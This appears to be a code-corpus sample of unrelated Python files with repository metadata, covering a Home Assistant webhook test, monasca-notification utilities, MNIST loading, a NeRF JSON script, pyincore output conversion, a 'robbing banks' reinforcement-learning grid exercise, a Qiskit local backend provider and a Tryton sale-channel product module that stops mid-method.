assert webhook_json["hls_path"] == "/api/streams/some_hls_stream"
assert webhook_json["mjpeg_path"] == "/api/camera_proxy_stream/camera.stream_camera"
async def test_webhook_camera_stream_stream_available_but_errors(
hass, create_registrations, webhook_client
):
"""Test fetching camera stream URLs for an HLS/stream-supporting camera but that streaming errors."""
hass.states.async_set(
"camera.stream_camera", "idle", {"supported_features": CAMERA_SUPPORT_STREAM}
)
webhook_id = create_registrations[1]["webhook_id"]
with patch(
"homeassistant.components.camera.async_request_stream",
side_effect=HomeAssistantError(),
):
resp = await webhook_client.post(
f"/api/webhook/{webhook_id}",
json={
"type": "stream_camera",
"data": {"camera_entity_id": "camera.stream_camera"},
},
)
assert resp.status == 200
webhook_json = await resp.json()
assert webhook_json["hls_path"] is None
assert webhook_json["mjpeg_path"] == "/api/camera_proxy_stream/camera.stream_camera"
| 31.799511 | 105 | 0.685068 | [
"Apache-2.0"
] | Bonnee/core | tests/components/mobile_app/test_webhook.py | 13,006 | Python |
# (C) Copyright 2016 Hewlett Packard Enterprise Development LP
# Copyright 2016 FUJITSU LIMITED
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import monascastatsd
from oslo_config import cfg
from oslo_log import log
from monasca_notification.common.repositories import exceptions
from monasca_notification.notification import Notification
LOG = log.getLogger(__name__)
CONF = cfg.CONF
NOTIFICATION_DIMENSIONS = {'service': 'monitoring',
'component': 'monasca-notification'}
def get_db_repo():
repo_driver = CONF.database.repo_driver
LOG.debug('Enabling the %s RDB repository', repo_driver)
return repo_driver(CONF)
def construct_notification_object(db_repo, notification_json):
try:
notification = Notification(notification_json['id'],
notification_json['type'],
notification_json['name'],
notification_json['address'],
notification_json['period'],
notification_json['retry_count'],
notification_json['raw_alarm'])
# Grab notification method from database to see if it was changed
stored_notification = grab_stored_notification_method(db_repo, notification.id)
# Notification method was deleted
if stored_notification is None:
LOG.debug("Notification method {0} was deleted from database. "
"Will stop sending.".format(notification.id))
return None
# Update notification method with most up to date values
else:
notification.name = stored_notification[0]
notification.type = stored_notification[1]
notification.address = stored_notification[2]
notification.period = stored_notification[3]
return notification
except exceptions.DatabaseException:
LOG.warn("Error querying mysql for notification method. "
"Using currently cached method.")
return notification
except Exception as e:
LOG.warn("Error when attempting to construct notification {0}".format(e))
return None
def grab_stored_notification_method(db_repo, notification_id):
try:
stored_notification = db_repo.get_notification(notification_id)
except exceptions.DatabaseException:
LOG.debug('Database Error. Attempting reconnect')
stored_notification = db_repo.get_notification(notification_id)
return stored_notification
def get_statsd_client(dimensions=None):
local_dims = dimensions.copy() if dimensions else {}
local_dims.update(NOTIFICATION_DIMENSIONS)
if CONF.statsd.enable:
LOG.debug("Stablishing connection with statsd on {0}:{1}"
.format(CONF.statsd.host, CONF.statsd.port))
client = monascastatsd.Client(name='monasca',
host=CONF.statsd.host,
port=CONF.statsd.port,
dimensions=local_dims)
else:
LOG.debug("Overriding monascastatsd.Client to use it offline")
client = OfflineClient(name='monasca',
host=CONF.statsd.host,
port=CONF.statsd.port,
dimensions=local_dims)
return client
class OfflineClient(monascastatsd.Client):
def _set_connection(self, connection, host, port):
if connection is None:
self.connection = OfflineConnection(host=host,
port=port,
max_buffer_size=self._max_buffer_size)
else:
self.connection = connection
class OfflineConnection(monascastatsd.Connection):
def __init__(self, host='localhost', port=8125, max_buffer_size=50):
"""Initialize an Offline Connection object.
>>> monascastatsd = MonascaStatsd()
:name: the name for this client. Everything sent by this client
will be prefixed by name
:param host: the host of the MonascaStatsd server.
:param port: the port of the MonascaStatsd server.
:param max_buffer_size: Maximum number of metric to buffer before
sending to the server if sending metrics in batch
"""
self.max_buffer_size = max_buffer_size
self._send = self._send_to_server
self.connect(host, port)
self.encoding = 'utf-8'
def connect(self, host, port):
"""Avoid to connect to the monascastatsd server.
"""
pass
def _send_to_server(self, packet):
pass
| 38.830882 | 87 | 0.635296 | [
"Apache-2.0"
] | martinchacon/monasca-notification | monasca_notification/common/utils.py | 5,281 | Python |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = "Christian Heider Nielsen"
__doc__ = r"""
"""
import h5py
import torch
import torch.utils
import torch.utils.data
from .h5_mnist_data import download_binary_mnist
def load_binary_mnist(cfg, **kwcfg):
fname = cfg.data_dir / "binary_mnist.h5"
if not fname.exists():
print("Downloading binary MNIST data...")
download_binary_mnist(fname)
f = h5py.File(str(fname), "r")
x_train = f["train"][::]
x_val = f["valid"][::]
x_test = f["test"][::]
train = torch.utils.data.TensorDataset(torch.from_numpy(x_train))
train_loader = torch.utils.data.DataLoader(
train, batch_size=cfg.batch_size, shuffle=True, **kwcfg
)
validation = torch.utils.data.TensorDataset(torch.from_numpy(x_val))
val_loader = torch.utils.data.DataLoader(
validation, batch_size=cfg.test_batch_size, shuffle=False
)
test = torch.utils.data.TensorDataset(torch.from_numpy(x_test))
test_loader = torch.utils.data.DataLoader(
test, batch_size=cfg.test_batch_size, shuffle=False
)
return train_loader, val_loader, test_loader
| 29.820513 | 72 | 0.684437 | [
"Apache-2.0"
] | cnheider/vision | samples/regression/vae/flow/data_loader.py | 1,163 | Python |
import json
import os
# set working directory
def gen_json(t):
print(os.getcwd())
# read log file
with open('Screenshots/Screenshoot_meta.txt', 'r') as f:
log = f.read()
data = {"camera_angle_x": 0.6911112070083618}
frames = []
line_cnt = 0
for line in log.split('\n'):
try:
record = {"file_path": "{}}_{:04d}".format(t,
line_cnt), "rotation": 4.0, "transform_matrix": eval(line)}
except:
pass
frames.append(record)
line_cnt += 1
data["frames"] = frames
data_json = json.dumps(data)
with open('Screenshots/Screenshoot_meta.json', 'w') as ff:
ff.write(data_json)
# %%
# %%
| 27.655172 | 118 | 0.495012 | [
"MIT"
] | songrise/nerf | my_src/meta_json.py | 802 | Python |
# This program and the accompanying materials are made available under the
# terms of the Mozilla Public License v2.0 which accompanies this distribution,
# and is available at https://www.mozilla.org/en-US/MPL/2.0/
from pyincore.utils.cgeoutputprocess import CGEOutputProcess
import os
PYINCOREPATH = "path-to-pyincore"
TESTAPATH = "pyincore/tests/pyincore/analyses/"
def run_convert_cge_json():
# run the JoplinCGE analysis first to get results, csv files
cge_json = CGEOutputProcess()
filepath = os.path.join(PYINCOREPATH, TESTAPATH, "joplincge")
cge_json.get_cge_household_count(None,
os.path.join(filepath, "joplin-pop-disl-results.csv"),
"cge_total_household_count.json")
cge_json.get_cge_gross_income(None,
os.path.join(filepath, "gross-income.csv"),
"cge_total_household_income.json")
cge_json.get_cge_employment(None, None,
os.path.join(filepath, "pre-disaster-factor-demand.csv"),
os.path.join(filepath, "post-disaster-factor-demand.csv"),
"cge_employment.json")
cge_json.get_cge_domestic_supply(None,
os.path.join(filepath, "domestic-supply.csv"),
"cge_domestic_supply.json")
return True
if __name__ == '__main__':
run_convert_cge_json()
| 44.205882 | 91 | 0.612774 | [
"MPL-2.0",
"MPL-2.0-no-copyleft-exception"
] | IN-CORE/pyincore | tests/pyincore/utils/test_csvoutputjson.py | 1,503 | Python |
import numpy as np
import matplotlib.pyplot as plt
import time
from IPython import display
# Implemented methods
methods = ['DynProg', 'ValIter'];
# Some colours
LIGHT_RED = '#FFC4CC';
LIGHT_GREEN = '#95FD99';
BLACK = '#000000';
WHITE = '#FFFFFF';
LIGHT_PURPLE = '#E8D0FF';
LIGHT_ORANGE = '#FAE0C3';
SEB_GREEN = '#52B92C';
BUSTED_BLUE = '#5993B5'
class RobbingBanks:
# Actions
STAY = 0
MOVE_LEFT = 1
MOVE_RIGHT = 2
MOVE_UP = 3
MOVE_DOWN = 4
# Give names to actions
actions_names = {
STAY: "stay",
MOVE_LEFT: "move left",
MOVE_RIGHT: "move right",
MOVE_UP: "move up",
MOVE_DOWN: "move down"
}
# Reward values
def __init__(self, town_map):
""" Constructor of the environment town_map.
"""
self.STEP_REWARD = 0
self.BANK_REWARD = 10
self.CAUGHT_REWARD = -50
self.town_map = town_map;
self.initial_state = np.array([0,0,1,2])
self.actions = self.__actions();
self.states, self.map = self.__states();
self.n_actions = len(self.actions);
self.n_states = len(self.states);
self.transition_probabilities = self.__transitions();
self.rewards = self.__rewards();
def __actions(self):
actions = dict();
actions[self.STAY] = np.array([0, 0]);
actions[self.MOVE_LEFT] = np.array([0,-1]);
actions[self.MOVE_RIGHT] = np.array([0, 1]);
actions[self.MOVE_UP] = np.array([-1,0]);
actions[self.MOVE_DOWN] = np.array([1,0]);
return actions;
def __states(self):
states = dict();
states_vec = dict();
s = 0;
for i in range(self.town_map.shape[0]):
for j in range(self.town_map.shape[1]):
for k in range(self.town_map.shape[0]):
for l in range(self.town_map.shape[1]):
states[s] = np.array([i,j,k,l]);
states_vec[(i,j,k,l)] = s;
s += 1;
return states, states_vec
def __move(self, state, action):
""" Makes a step in the town_map, given a current position and an action.
If the action STAY or an inadmissible action is used, the robber stays in place.
:return integer next_cell corresponding to position (x,y) x (x,y) on the town_map that agent transitions to.
"""
# Compute the future position given current (state, action)
row = self.states[state][0] + self.actions[action][0];
col = self.states[state][1] + self.actions[action][1];
# Is the future position an impossible one ?
hitting_town_walls = (row == -1) or (row == self.town_map.shape[0]) or \
(col == -1) or (col == self.town_map.shape[1])
# Based on the impossiblity check return the next state.
list_police_pos = self.__police_positions(state)
new_police_pos = list_police_pos[np.random.randint(len(list_police_pos))]
#caught = (row, col) == (new_police_pos[0], new_police_pos[1])
caught = all(self.states[state][0:2] == self.states[state][2:])
if caught:
return self.map[tuple(self.initial_state)];
#Hot take: If you "unintentionally" hit the wall, the result should be that you (and the police) stay in place since it's not a "deliberate" move
elif hitting_town_walls:
return state
else:
return self.map[(row, col, new_police_pos[0], new_police_pos[1])];
def __police_positions(self, state):
"""
Input: The state as an int
Returns: A list of possible new minotaur positions from current state
"""
agent_pos = self.states[state][0:2]
police_pos = self.states[state][2:]
diff_pos = np.sign(agent_pos - police_pos)
list_pos = [[1,0], [-1,0], [0, diff_pos[1]]] if diff_pos[0] == 0 else [[0,1], [0,-1], [diff_pos[0],0]] if diff_pos[1] == 0 else [[0,diff_pos[1]], [diff_pos[0],0]]
list_pos += police_pos
list_pos = list(filter(None,[tuple(pos)*(0<=pos[0]<self.town_map.shape[0] and 0<=pos[1]<self.town_map.shape[1]) for pos in list_pos]))
return list_pos
def __transitions(self):
""" Computes the transition probabilities for every state action pair.
:return numpy.tensor transition probabilities: tensor of transition
probabilities of dimension S*S*A
"""
# Initialize the transition probailities tensor (S,S,A)
dimensions = (self.n_states,self.n_states,self.n_actions);
transition_probabilities = np.zeros(dimensions);
# Compute the transition probabilities. Note that the transitions
# are deterministic.
for s in range(self.n_states):
#if we are in the same position as the police, we return to initial
if (self.states[s][0],self.states[s][1])==(self.states[s][2],self.states[s][3]):
transition_probabilities[self.initial_state, s, :] = 1/3
else:
for a in range(self.n_actions):
list_pos = self.__police_positions(s) #police positions
for police_pos in list_pos:
next_s = self.__move(s,a);
new_pos = np.copy(self.states[next_s])
new_pos[2:] = police_pos
next_s = self.map[tuple(new_pos)]
transition_probabilities[next_s, s, a] = 1/len(list_pos);
return transition_probabilities;
def __rewards(self):
rewards = np.zeros((self.n_states, self.n_actions));
# rewards[i,j,k] = r(s' | s, a): tensor of rewards of dimension S x S x A
for s in range(self.n_states):
list_pos = self.__police_positions(s)
for a in range(self.n_actions):
next_s = self.__move(s,a);
#if we can get caught in the next move
if (tuple(self.states[next_s][0:2]) in list_pos):
#if our next position is not a bank
if self.town_map[tuple(self.states[next_s][0:2])] != 1:
rewards[s,a] = self.CAUGHT_REWARD/len(list_pos)
#if our next position is a bank
if self.town_map[tuple(self.states[next_s][0:2])] == 1:
rewards[s,a] = self.CAUGHT_REWARD/len(list_pos) + (len(list_pos)-1)*self.BANK_REWARD/len(list_pos)
#if we cannot get caught in the next move
else:
#reward for standing in a bank
if self.town_map[tuple(self.states[next_s][0:2])] == 1:
rewards[s,a] = self.BANK_REWARD
# list_pos = self.__police_positions(s)
# for a in range(self.n_actions):
# next_s = self.__move(s,a);
return rewards;
def simulate(self,policy):
path = list();
# Initialize current state, next state and time
t = 1;
s = self.map[tuple(self.initial_state)];
# Add the starting position in the town_map to the path
path.append(self.initial_state);
# Move to next state given the policy and the current state
next_s = self.__move(s,policy[s]);
# Add the position in the town_map corresponding to the next state
# to the pygame.freetype.path
path.append(self.states[next_s]);
# Loop while state is not the goal state
T = 40
while t<T:
# Update state
s = next_s;
# Move to next state given the policy and the current state
next_s = self.__move(s,policy[s]);
# Add the position in the town_map corresponding to the next state
# to the path
path.append(self.states[next_s])
# Update time and state for next iteration
t +=1;
return path
def show(self):
print('The states are :')
print(self.states)
print('The actions are:')
print(self.actions)
print('The mapping of the states:')
print(self.map)
print('The rewards:')
print(self.rewards)
def value_iteration(env, gamma, epsilon):
""" Solves the shortest path problem using value iteration
:input town_map env : The town_map environment in which we seek to
find the shortest path.
:input float gamma : The discount factor.
:input float epsilon : accuracy of the value iteration procedure.
:return numpy.array V : Optimal values for every state at every
time, dimension S*T
:return numpy.array policy: Optimal time-varying policy at every state,
dimension S*T
"""
# The value itearation algorithm requires the knowledge of :
# - Transition probabilities
# - Rewards
# - State space
# - Action space
# - The finite horizon
p = env.transition_probabilities;
r = env.rewards;
n_states = env.n_states;
n_actions = env.n_actions;
# Required variables and temporary ones for the VI to run
V = np.zeros(n_states);
Q = np.zeros((n_states, n_actions));
BV = np.zeros(n_states);
# Iteration counter
n = 0;
# Tolerance error
tol = (1 - gamma)* epsilon/gamma;
#tol = 100
# Initialization of the VI
for s in range(n_states):
for a in range(n_actions):
Q[s, a] = r[s, a] + gamma*np.dot(p[:,s,a],V);
BV = np.max(Q, 1);
# Iterate until convergence
while np.linalg.norm(V - BV) >= tol and n < 2600:
# Increment by one the numbers of iteration
n += 1;
# Update the value function
V = np.copy(BV);
# Compute the new BV
for s in range(n_states):
for a in range(n_actions):
Q[s, a] = r[s, a] + gamma*np.dot(p[:,s,a],V);
BV = np.max(Q, 1);
# Show error
#print(np.linalg.norm(V - BV))
# Compute policy
policy = np.argmax(Q,1);
# Return the obtained policy
return V, policy;
def draw_town_map(town_map):
# Map a color to each cell in the town_map
col_map = {0: WHITE, 1: BLACK, 2: LIGHT_GREEN, -6: LIGHT_RED, -1: LIGHT_RED};
# Give a color to each cell
rows,cols = town_map.shape;
colored_town_map = [[col_map[town_map[j,i]] for i in range(cols)] for j in range(rows)];
# Create figure of the size of the town_map
fig = plt.figure(1, figsize=(cols,rows));
# Remove the axis ticks and add title title
ax = plt.gca();
ax.set_title('The town_map');
ax.set_xticks([]);
ax.set_yticks([]);
# Give a color to each cell
rows,cols = town_map.shape;
colored_town_map = [[col_map[town_map[j,i]] for i in range(cols)] for j in range(rows)];
# Create figure of the size of the town_map
fig = plt.figure(1, figsize=(cols,rows))
# Create a table to color
grid = plt.table(cellText=None,
cellColours=colored_town_map,
cellLoc='center',
loc=(0,0),
edges='closed');
# Modify the hight and width of the cells in the table
tc = grid.properties()['children']
for cell in tc:
cell.set_height(1.0/rows);
cell.set_width(1.0/cols);
def animate_solution(town_map, path, save_anim = False, until_caught = False, gamma = 0):
# Map a color to each cell in the town_map
col_map = {0: WHITE, 1: SEB_GREEN, 2: LIGHT_GREEN, -6: LIGHT_RED, -1: LIGHT_RED};
# Size of the town_map
rows,cols = town_map.shape;
# Create figure of the size of the town_map
fig = plt.figure(1, figsize=(cols,rows));
# Remove the axis ticks and add title title
ax = plt.gca();
ax.set_title('Policy simulation: $\lambda$ = %0.1f' %gamma);
ax.set_xticks([]);
ax.set_yticks([]);
# Give a color to each cell
colored_town_map = [[col_map[town_map[j,i]] for i in range(cols)] for j in range(rows)];
# Create figure of the size of the town_map
fig = plt.figure(1, figsize=(cols,rows))
# Create a table to color
grid = plt.table(cellText=None,
cellColours=colored_town_map,
cellLoc='center',
loc=(0,0),
edges='closed');
# Modify the hight and width of the cells in the table
tc = grid.properties()['children']
for cell in tc:
cell.set_height(1.0/rows);
cell.set_width(1.0/cols);
# Update the color at each frame
path_robber = [tuple(p)[0:2] for p in path]
path_police = [tuple(p)[2:] for p in path]
for i in range(len(path_robber)):
if i == 0:
grid.get_celld()[(path_robber[i])].set_facecolor(LIGHT_ORANGE)
grid.get_celld()[(path_robber[i])].get_text().set_text('Robber')
grid.get_celld()[(path_police[i])].set_facecolor(LIGHT_RED)
grid.get_celld()[(path_police[i])].get_text().set_text('Police')
if save_anim:
plt.savefig('optimal_policy_'+str(i))
else:
if until_caught and path_robber[i] == path_police[i]:
grid.get_celld()[(path_robber[i-1])].set_facecolor(col_map[town_map[path_robber[i-1]]])
grid.get_celld()[(path_robber[i-1])].get_text().set_text('')
grid.get_celld()[(path_police[i-1])].set_facecolor(col_map[town_map[path_police[i-1]]])
grid.get_celld()[(path_police[i-1])].get_text().set_text('')
grid.get_celld()[(path_police[i])].set_facecolor(BUSTED_BLUE)
grid.get_celld()[(path_police[i])].get_text().set_text('BUSTED')
print("BUSTED!!!", gamma)
if save_anim:
plt.savefig(str(gamma)+'_'+str(i)+'.png')
break
if save_anim:
plt.savefig(str(gamma)+'_'+str(i)+'.png')
grid.get_celld()[(path_robber[i-1])].set_facecolor(col_map[town_map[path_robber[i-1]]])
grid.get_celld()[(path_robber[i-1])].get_text().set_text('')
grid.get_celld()[(path_police[i-1])].set_facecolor(col_map[town_map[path_police[i-1]]])
grid.get_celld()[(path_police[i-1])].get_text().set_text('')
grid.get_celld()[(path_robber[i])].set_facecolor(LIGHT_ORANGE)
grid.get_celld()[(path_robber[i])].get_text().set_text('Robber')
grid.get_celld()[(path_police[i])].set_facecolor(LIGHT_RED)
grid.get_celld()[(path_police[i])].get_text().set_text('Police')
grid.get_celld()[0,0].get_text().set_text('SEB')
grid.get_celld()[0,0].get_text().set_color('white')
grid.get_celld()[0,5].get_text().set_text('SEB')
grid.get_celld()[0,5].get_text().set_color('white')
grid.get_celld()[2,0].get_text().set_text('SEB')
grid.get_celld()[2,0].get_text().set_color('white')
grid.get_celld()[2,5].get_text().set_text('SEB')
grid.get_celld()[2,5].get_text().set_color('white')
plt.pause(0.7)
plt.show()
town_map= np.array([
[ 1, 0, 0, 0, 0, 1],
[ 0, 0, 0, 0, 0, 0],
[ 1, 0, 0, 0, 0, 1]
])
rb = RobbingBanks(town_map)
p=rb.transition_probabilities
n=rb.n_states
for s in range(n):
summ=np.sum(p[:,s,3])
if summ>1:
print(rb.states[s])
# PLOTTING VALUE_FUNC(INIT_STATE) AS A FUNCTION OF LAMBDA/GAMMA
"""
gammas = np.linspace(0.01,1,100,endpoint=False)
values = []
for gamma in gammas:
V, policy = value_iteration(rb, gamma, epsilon = 1e-6)
values.append(V[rb.map[(0,0,1,2)]])
plt.semilogy(gammas,values,'--')
plt.xlabel('Discount rate $\lambda$')
plt.ylabel('Value function V')
plt.title('Effect of $\lambda$ on V')
plt.plot()
#plt.show()
plt.savefig('Value_2b.png')
"""
# PLOTTING OPTIMAL POLICY FOR DIFFERENT LAMBDAS
"""
gammas = [0.1,0.5,0.8]
for gamma in gammas:
V, policy = value_iteration(rb, gamma, 1e-6)
path = rb.simulate(policy)
animate_solution(town_map, path, save_anim = False, until_caught = True,gamma=gamma)
""" | 37.297968 | 170 | 0.57308 | [
"MIT"
] | takeitbillykyle/EL2805-Reinforcement-Learning- | Assignment 2/robbing_banks.py | 16,523 | Python |
# -*- coding: utf-8 -*-
# Copyright 2018, IBM.
#
# This source code is licensed under the Apache License, Version 2.0 found in
# the LICENSE.txt file in the root directory of this source tree.
# pylint: disable=invalid-name, bad-continuation
"""Provider for local backends."""
import logging
from qiskit._qiskiterror import QISKitError
from qiskit.backends import BaseProvider
from .qasm_simulator_cpp import CliffordSimulatorCpp, QasmSimulatorCpp
from .qasm_simulator_py import QasmSimulatorPy
from .statevector_simulator_cpp import StatevectorSimulatorCpp
from .statevector_simulator_py import StatevectorSimulatorPy
from .unitary_simulator_py import UnitarySimulatorPy
logger = logging.getLogger(__name__)
SDK_STANDARD_BACKENDS = [
QasmSimulatorCpp,
QasmSimulatorPy,
StatevectorSimulatorCpp,
StatevectorSimulatorPy,
UnitarySimulatorPy,
CliffordSimulatorCpp,
]
class LocalProvider(BaseProvider):
"""Provider for local backends."""
def __init__(self, *args, **kwargs):
super().__init__(args, kwargs)
# Populate the list of local backends.
self.backends = self._verify_local_backends()
def get_backend(self, name):
return self.backends[name]
def available_backends(self, filters=None):
# pylint: disable=arguments-differ
backends = self.backends
filters = filters or {}
for key, value in filters.items():
backends = {name: instance for name, instance in backends.items()
if instance.configuration.get(key) == value}
return list(backends.values())
def aliased_backend_names(self):
return {
'local_qasm_simulator': ['local_qasm_simulator_cpp',
'local_qasm_simulator_py'],
'local_statevector_simulator': ['local_statevector_simulator_cpp',
'local_statevector_simulator_py'],
'local_unitary_simulator': ['local_unitary_simulator_cpp',
'local_unitary_simulator_py']
# TODO: restore after clifford simulator release
# 'local_clifford_simulator': ['local_clifford_simulator_cpp']
}
def deprecated_backend_names(self):
return {
'local_qiskit_simulator': 'local_qasm_simulator_cpp',
'wood_simulator': 'local_qasm_simulator_cpp',
}
@classmethod
def _verify_local_backends(cls):
"""
Return the local backends in `SDK_STANDARD_BACKENDS` that are
effectively available (as some of them might depend on the presence
of an optional dependency or on the existence of a binary).
Returns:
dict[str:BaseBackend]: a dict of the local backends instances for
the backends that could be instantiated, keyed by backend name.
"""
ret = {}
for backend_cls in SDK_STANDARD_BACKENDS:
try:
backend_instance = cls._get_backend_instance(backend_cls)
backend_name = backend_instance.configuration['name']
ret[backend_name] = backend_instance
except QISKitError as e:
# Ignore backends that could not be initialized.
logger.info('local backend %s is not available: %s',
backend_cls, str(e))
return ret
@classmethod
def _get_backend_instance(cls, backend_cls):
"""
Return an instance of a backend from its class.
Args:
backend_cls (class): Backend class.
Returns:
BaseBackend: a backend instance.
Raises:
QISKitError: if the backend could not be instantiated or does not
provide a valid configuration containing a name.
"""
# Verify that the backend can be instantiated.
try:
backend_instance = backend_cls()
except Exception as err:
raise QISKitError('Backend %s could not be instantiated: %s' %
(cls, err))
# Verify that the instance has a minimal valid configuration.
try:
_ = backend_instance.configuration['name']
except (LookupError, TypeError):
raise QISKitError('Backend %s has an invalid configuration')
return backend_instance
| 35.829268 | 79 | 0.640345 | [
"Apache-2.0"
] | Hosseinyeganeh/qiskit-core | qiskit/backends/local/localprovider.py | 4,407 | Python |
# -*- coding: utf-8 -*-
"""
product.py
Implementing Add listing wizard for downstream modules:
* In the __setup__ method of `product.listing.add.start` in downstream
module, add the type as a valid channel type. Since this is non trivial
a convenience method `add_source` is provided which will add the source
type in an idempotent fashion.
* Implement a StateView in the `product.listing.add` wizard with the name
`start_<source_name>`. This StateView can change the state to other state
views or transitions. Eventually it should end with the `end` state.
"""
from collections import defaultdict
from trytond.pool import PoolMeta, Pool
from trytond.wizard import Wizard, Button, StateTransition, StateView
from trytond.transaction import Transaction
from trytond.model import ModelView, fields, ModelSQL, Unique
from trytond.pyson import Eval, Bool
__metaclass__ = PoolMeta
__all__ = [
'ProductSaleChannelListing', 'Product', 'AddProductListing',
'AddProductListingStart', 'TemplateSaleChannelListing',
'Template'
]
class AddProductListingStart(ModelView):
"Add listing form start"
__name__ = 'product.listing.add.start'
product = fields.Many2One(
'product.product', 'Product', readonly=True
)
channel = fields.Many2One(
'sale.channel', 'Channel', required=True,
domain=[('source', 'in', [])]
)
channel_source = fields.Function(
fields.Char("Channel Source"),
getter="on_change_with_channel_source"
)
@fields.depends('channel')
def on_change_with_channel_source(self, name=None):
return self.channel and self.channel.source
@classmethod
def add_source(cls, source):
"""
A convenience method for downstream modules to add channel
source types once they have implemented the step in the wizard
below.
This method must be called from `__setup__` method of downstream
module.
"""
source_leaf = cls.channel.domain[0][2]
if source not in source_leaf:
source_leaf.append(source)
class AddProductListing(Wizard):
"Add product Channel Listing Wizard"
__name__ = 'product.listing.add'
start = StateView(
'product.listing.add.start',
'sale_channel.listing_add_start_form', [
Button('Cancel', 'end', 'tryton-cancel'),
Button('Next', 'next', 'tryton-go-next', default=True),
]
)
next = StateTransition()
def default_start(self, fields):
return {
'product': Transaction().context['active_id']
}
def transition_next(self):
return 'start_%s' % self.start.channel.source
class Template:
"Product Template"
__name__ = 'product.template'
channel_listings = fields.One2Many(
'product.template.channel_listing', 'template', 'Channel Listings'
)
class TemplateSaleChannelListing(ModelSQL, ModelView):
"""
Template - Sale Channel
This model keeps a record of a template's association with Sale Channels.
"""
__name__ = 'product.template.channel_listing'
channel = fields.Many2One(
'sale.channel', 'Sale Channel',
domain=[('source', '!=', 'manual')],
select=True, required=True,
ondelete='RESTRICT'
)
template = fields.Many2One(
'product.template', 'Product Template', required=True,
select=True, ondelete='CASCADE'
)
template_identifier = fields.Char(
'Template Identifier', select=True, required=True
)
@classmethod
def __setup__(cls):
"""
Setup the class and define constraints
"""
super(TemplateSaleChannelListing, cls).__setup__()
table = cls.__table__()
cls._sql_constraints += [(
'channel_template_unique',
Unique(table, table.channel, table.template_identifier, table.template), # noqa
'Product Template is already mapped to this channel with same identifier' # noqa
)]
class Product:
"Product"
__name__ = "product.product"
channel_listings = fields.One2Many(
'product.product.channel_listing', 'product', 'Channel Listings',
)
@classmethod
def __setup__(cls):
super(Product, cls).__setup__()
cls._buttons.update({
'add_listing': {},
})
@classmethod
@ModelView.button_action('sale_channel.wizard_add_listing')
def add_listing(cls, products):
pass
@classmethod
def create_from(cls, channel, product_data):
"""
Create the product for the channel
"""
raise NotImplementedError(
"create_from is not implemented in product for %s channels"
% channel.source
)
class ProductSaleChannelListing(ModelSQL, ModelView):
'''Product - Sale Channel
This model keeps a record of a product's association with Sale Channels.
A product can be listed on multiple marketplaces
'''
__name__ = 'product.product.channel_listing'
# TODO: Only show channels where this ability is there. For example
# showing a manual channel is pretty much useless
channel = fields.Many2One(
'sale.channel', 'Sale Channel',
domain=[('source', '!=', 'manual')],
required=True, select=True,
ondelete='RESTRICT'
)
product = fields.Many2One(
'product.product', 'Product', select=True,
states={'required': Eval('state') == 'active'},
ondelete='CASCADE', depends=['state']
)
product_identifier = fields.Char(
"Product Identifier", select=True, required=True
)
state = fields.Selection([
('active', 'Active'),
('disabled', 'Disabled'),
], 'State', required=True, select=True)
channel_source = fields.Function(
fields.Char("Channel Source"),
getter="get_channel_source"
)
quantity = fields.Function(
fields.Float(
'Quantity',
digits=(16, Eval('unit_digits', 2)), depends=['unit_digits']
), 'get_availability_fields'
)
unit_digits = fields.Function(
fields.Integer('Unit Digits'), 'get_unit_digits'
)
availability_type_used = fields.Function(
fields.Selection([
('bucket', 'Bucket'),
('quantity', 'Quantity'),
('infinite', 'Infinite'),
], 'Type'), 'get_availability_fields'
)
availability_used = fields.Function(
fields.Selection([
('in_stock', 'In-Stock'),
('out_of_stock', 'Out Of Stock'),
], 'Availability', states={
'invisible': ~Bool(Eval('availability_type_used') == 'bucket')
}, depends=['availability_type_used']),
'get_availability_fields'
)
listing_url = fields.Function(
fields.Char('Listing URL'), 'get_listing_url'
)
@classmethod
def search_rec_name(cls, name, clause):
return [
'OR',
('product',) + tuple(clause[1:]),
('product_identifier',) + tuple(clause[1:]),
]
@classmethod
def get_unit_digits(cls, records, name):
result = {r.id: r.product.default_uom.digits if r.product else 2
for r in records}
return result
@classmethod
def get_listing_url(cls, records, name):
"""
Downstream modules should implement this function
and return a valid url
"""
return dict.fromkeys([r.id for r in records])
@classmethod
def get_availability_fields(cls, listings, names):
listing_ids = map(int, listings)
values = defaultdict(lambda: dict.fromkeys(listing_ids, None))
for name in names:
# Just call the default dict once so all fields have values
# even if product is absent
values[name]
for listing in listings:
if listing.product:
availability = listing.get_availability()
values['availability_type_used'][listing.id] = \
availability['type']
values['availability_used'][listing.id] = availability.get(
'value'
)
values['quantity'][listing.id] = availability.get('quantity')
return values
@classmethod
def get_channel_source(cls, records, name):
result = {r.id: r.channel and r.channel.source for r in records}
return result
@fields.depends('channel')
def on_change_with_channel_source(self, name=None):
return self.channel and self.channel.source
@classmethod
def __setup__(cls):
'''
Setup the class and define constraints
'''
super(ProductSaleChannelListing, cls).__setup__()
table = cls.__table__()
cls._sql_constraints += [
(
'channel_product_identifier_uniq',
Unique(table, table.channel, table.product_identifier),
'This external product is already mapped with same channel.'
)
]
cls._buttons.update({
'export_inventory_button': {},
})
@staticmethod
def default_state():
return 'active'
@classmethod
def create_from(cls, channel, product_data):
"""
Create a listing for the product from channel and data
"""
raise NotImplementedError(
"create_from is not implemented in channel listing for %s channels"
% channel.source
)
@classmethod
@ModelView.button
def export_inventory_button(cls, listings):
return cls.export_bulk_inventory(listings)
def export_inventory(self):
"""
Export listing.product inventory to listing.channel
Since external channels are implemented by downstream modules, it is
the responsibility of those channels to implement exporting or call
super to delegate.
"""
raise NotImplementedError(
"Export inventory is not implemented for %s channels"
% self.channel.source
)
@classmethod
def export_bulk_inventory(cls, listings):
"""
Export listing.product inventory to listing.channel in bulk
Since external channels are implemented by downstream modules, it is
the responsibility of those channels to implement bulk exporting for
respective channels.
Default behaviour is to export inventory individually.
"""
for listing in listings:
listing.export_inventory()
def import_product_image(self):
"""
Import specific product image from external channel based on product
identifier.
Since external channels are implemented by downstream modules, it is
the responsibility of those channels to implement importing or call
super to delegate.
"""
raise NotImplementedError(
"Method import_product_image is not implemented for %s channel yet"
% self.source
)
def get_availability_context(self):
"""
Allow overriding the context used to compute availability of
products.
"""
return {
'locations': [self.channel.warehouse.id],
}
def get_availability(self):
"""
Return the availability of the product for this listing
